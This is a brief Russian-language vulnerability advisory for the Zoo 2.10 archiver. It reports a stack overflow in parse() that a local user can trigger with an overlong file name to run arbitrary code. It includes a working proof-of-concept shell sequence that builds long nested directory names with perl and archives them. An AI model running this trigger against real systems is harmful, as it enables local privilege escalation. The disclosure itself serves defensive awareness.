Программа: Zoo 2.10
Уязвимость позволяет локальному
пользователю повысить свои привилегии на
системе. Уязвимость существует из-за ошибки
проверки границ данных в функции "parse()"
в файле parse.c во добавления в архив файла с
очень длинным именем. Локальный
пользователь может с помощью специально
сформированного имени файла вызвать
переполнение стека и выполнить
произвольный код на системе.
Пример:
mkdir `perl -e 'print "A"x254'`
cd `perl -e 'print "A"x254'`
mkdir `perl -e 'print "A"x254'`
cd `perl -e 'print "A"x254'`
touch feh
cd ../..
zoo a arch.zoo `perl -e 'print "A"x254 . "/" .
"A"x254 . "/feh"'`
